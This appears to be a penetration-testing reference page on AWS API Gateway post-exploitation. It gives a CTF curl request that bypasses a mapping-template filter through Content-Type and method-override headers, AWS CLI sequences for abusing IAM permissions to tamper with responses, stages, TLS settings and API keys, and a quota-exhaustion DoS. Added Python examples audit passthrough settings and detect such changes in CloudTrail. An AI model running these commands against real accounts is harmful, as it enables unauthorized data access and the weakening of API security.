AWS - API Gateway Post Exploitation
API Gateway
For more information check:
Accessing unexposed APIs
You can create an endpoint at https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint for the service com.amazonaws.us-east-1.execute-api, expose that endpoint in a network you have access to (for example through an EC2 machine) and assign it a security group that allows all connections.
Then, from the EC2 machine you will be able to reach the endpoint and therefore call the gateway API that was not exposed before.
Bypass Request body passthrough
This technique was found in this CTF writeup.
As indicated in the AWS documentation in the PassthroughBehavior section, the default value WHEN_NO_MATCH means that, when the Content-Type header of the request does not match any mapping template, the request is passed to the back end without transformation.
Therefore, in the CTF the API Gateway had an integration template that prevented the flag from being exfiltrated in the response when the request was sent with Content-Type: application/json:
RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
However, sending the request with Content-Type: text/json did not match the template and therefore bypassed that filter.
Finally, since the API Gateway only allowed GET and OPTIONS, it was possible to send any DynamoDB query without that restriction by sending a POST request with the query in the request body and the header X-HTTP-Method-Override: GET:
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
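Added example (not code from the writeup or the original page): a re-implementation of the passthroughBehavior selection rules described above, used to audit integrations whose mapping template acts as a filter; the integration names and the shortened template are constructed.

```python
"""Added example (not from the original page): a re-implementation of API Gateway's
passthroughBehavior rules, used to audit integrations offline for templates that
act as filters but can be skipped by changing the Content-Type header."""

UNSUPPORTED_MEDIA_TYPE = "415 Unsupported Media Type"


def select_template(content_type, request_templates, passthrough="WHEN_NO_MATCH"):
    """Return ('template', tpl), ('passthrough', None) or ('reject', reason).
    Assumed simplifications: only the media type is compared (charset etc. dropped)
    and a missing Content-Type counts as application/json, API Gateway's default."""
    media_type = (content_type or "application/json").split(";")[0].strip().lower()
    templates = {k.lower(): v for k, v in request_templates.items()}
    if media_type in templates:
        return ("template", templates[media_type])
    if passthrough == "WHEN_NO_MATCH":
        return ("passthrough", None)           # raw body forwarded unchanged
    if passthrough == "WHEN_NO_TEMPLATES" and not templates:
        return ("passthrough", None)
    return ("reject", UNSUPPORTED_MEDIA_TYPE)  # NEVER, or templates exist


def find_bypassable_filters(integrations):
    """Flag integrations (shaped like `aws apigateway get-integration` output) whose
    mapping template only applies when the client cooperates with the Content-Type."""
    findings = []
    for integ in integrations:
        templates = integ.get("requestTemplates") or {}
        behaviour = integ.get("passthroughBehavior", "WHEN_NO_MATCH")
        if not templates:
            continue                           # nothing to bypass
        kind, _ = select_template("text/json", templates, behaviour)
        if kind == "passthrough":
            findings.append(f"{integ['name']}: {behaviour} lets a non-matching "
                            f"Content-Type skip templates {sorted(templates)}")
    return findings


# Constructed sample: the page's CTF integration (shortened) and a hardened copy.
CTF_TEMPLATE = '{"TableName":"Movies","FilterExpression":"not contains(#description, :flagstring)"}'
SAMPLE_INTEGRATIONS = [
    {"name": "movies (CTF)", "passthroughBehavior": "WHEN_NO_MATCH",
     "requestTemplates": {"application/json": CTF_TEMPLATE}},
    {"name": "movies (fixed)", "passthroughBehavior": "NEVER",
     "requestTemplates": {"application/json": CTF_TEMPLATE}},
]

if __name__ == "__main__":
    print("\n".join(find_bypassable_filters(SAMPLE_INTEGRATIONS)))
```

Only the WHEN_NO_MATCH integration is reported; with NEVER (or WHEN_NO_TEMPLATES once a template exists) an unmatched Content-Type is answered with 415 instead of reaching DynamoDB unfiltered.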
Usage Plans DoS
In the Enumeration section you can see how to obtain the usage plan of the keys. If you have a key and it is limited to X uses per month, you can simply use it up and cause a DoS.
apigateway:UpdateGatewayResponse, apigateway:CreateDeployment
An attacker with the permissions apigateway:UpdateGatewayResponse and apigateway:CreateDeployment can modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts.
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
# Update the Gateway Response. The patch is given as JSON inside single quotes so the
# shell does not expand $context and the escaped quotes inside the template survive.
aws apigateway update-gateway-response --rest-api-id "$API_ID" --response-type "$RESPONSE_TYPE" \
  --patch-operations '[{"op":"replace","path":"/responseTemplates/application~1json","value":"{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"}]'
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id "$API_ID" --stage-name Prod
Potential Impact: Leakage of sensitive information, execution of malicious scripts, or unauthorized access to API resources.
Note: Needs testing.
apigateway:UpdateStage, apigateway:CreateDeployment
An attacker with the permissions apigateway:UpdateStage and apigateway:CreateDeployment can modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings in order to gain unauthorized access to cached data.
API_ID="your-api-id"
STAGE_NAME="Prod"
# Update the API Gateway stage. Each patch operation is a separate shorthand argument;
# joining them with a comma would be parsed as one malformed operation.
aws apigateway update-stage --rest-api-id "$API_ID" --stage-name "$STAGE_NAME" \
  --patch-operations op=replace,path=/cacheClusterEnabled,value=true op=replace,path=/cacheClusterSize,value=0.5
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id "$API_ID" --stage-name "$STAGE_NAME"
Potential Impact: Unauthorized access to cached data, interception or manipulation of API traffic.
Note: Needs testing.
apigateway:PutMethodResponse, apigateway:CreateDeployment
An attacker with the permissions apigateway:PutMethodResponse and apigateway:CreateDeployment can modify the method response of an existing API Gateway REST API to include custom headers or response templates that leak sensitive information or execute malicious scripts.
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"
# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Potential Impact: Leakage of sensitive information, execution of malicious scripts, or unauthorized access to API resources.
Note: Needs testing.
apigateway:UpdateRestApi, apigateway:CreateDeployment
An attacker with the permissions apigateway:UpdateRestApi and apigateway:CreateDeployment can modify the settings of an API Gateway REST API to disable logging or change the minimum TLS version, thereby potentially weakening the security of the API.
API_ID="your-api-id"
# Update the REST API settings. Each patch operation is a separate shorthand argument.
# Note that the TLS floor of an API is actually the securityPolicy of its custom domain
# (update-domain-name); the minimumTlsVersion path below is kept as the page wrote it.
aws apigateway update-rest-api --rest-api-id "$API_ID" \
  --patch-operations op=replace,path=/minimumTlsVersion,value=TLS_1.0 op=replace,path=/apiKeySource,value=AUTHORIZER
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id "$API_ID" --stage-name Prod
Potential Impact: Weakening of the API's security, potentially enabling unauthorized access or exposing sensitive information.
Note: Needs testing.
apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey
An attacker with the permissions apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan and apigateway:CreateUsagePlanKey can create new API keys, associate them with usage plans, and then use those keys for unauthorized access to the APIs.
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
Potential Impact: Unauthorized access to API resources, bypassing security controls.
Note: Needs testing.
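As an added example (not from the original page) covering the permission chains in the sections above, here is the detection logic that pairs each configuration change with the CreateDeployment that makes it live, run over constructed CloudTrail records; the ARNs, API ids and timestamps are made up.

```python
"""Added example (not from the original page): detection logic for the chains above, run over
constructed CloudTrail records. A config change followed by CreateDeployment on the same API is
what makes the attacker's edit live, so that pairing is what gets flagged."""
import json
from datetime import datetime, timedelta

CONFIG_CHANGES = {"UpdateGatewayResponse", "UpdateStage", "PutMethodResponse", "UpdateRestApi"}

def parse_events(raw):
    """Reduce a CloudTrail export to time-sorted (time, eventName, actor, restApiId) tuples."""
    rows = []
    for ev in json.loads(raw)["Records"]:
        if ev.get("eventSource") != "apigateway.amazonaws.com":
            continue
        ts = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        api = (ev.get("requestParameters") or {}).get("restApiId")
        rows.append((ts, ev["eventName"], ev.get("userIdentity", {}).get("arn", "?"), api))
    return sorted(rows, key=lambda r: r[0])

def find_change_then_deploy(events, window=timedelta(minutes=15)):
    """Pair each CreateDeployment with config changes on the same API inside `window`."""
    alerts = []
    for ts, name, actor, api in events:
        if name != "CreateDeployment":
            continue
        for pts, pname, pactor, papi in events:
            if papi == api and pname in CONFIG_CHANGES and timedelta(0) <= ts - pts <= window:
                alerts.append({"api": api, "change": pname, "changed_by": pactor,
                               "deployed_by": actor, "deployed_at": ts.isoformat()})
    return alerts

# Constructed sample records (not real account data); only the fields used above are present.
ACTOR = "arn:aws:iam::111111111111:user/alice"
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventSource": "apigateway.amazonaws.com", "eventName": "UpdateGatewayResponse",
     "eventTime": "2024-01-01T10:00:00Z", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"restApiId": "abc123", "responseType": "DEFAULT_4XX"}},
    {"eventSource": "apigateway.amazonaws.com", "eventName": "CreateDeployment",
     "eventTime": "2024-01-01T10:02:30Z", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"restApiId": "abc123", "stageName": "Prod"}},
    {"eventSource": "apigateway.amazonaws.com", "eventName": "UpdateStage",  # routine, 3h earlier
     "eventTime": "2024-01-01T08:00:00Z", "userIdentity": {"arn": "arn:aws:iam::111111111111:role/ci"},
     "requestParameters": {"restApiId": "xyz789", "stageName": "Prod"}},
    {"eventSource": "apigateway.amazonaws.com", "eventName": "CreateDeployment",
     "eventTime": "2024-01-01T11:00:00Z", "userIdentity": {"arn": "arn:aws:iam::111111111111:role/ci"},
     "requestParameters": {"restApiId": "xyz789", "stageName": "Prod"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject", "eventTime": "2024-01-01T10:01:00Z"},
]})
```

Running `find_change_then_deploy(parse_events(SAMPLE_TRAIL))` reports only the abc123 chain; the xyz789 deployment three hours after its stage update falls outside the default window and is left for the normal change review.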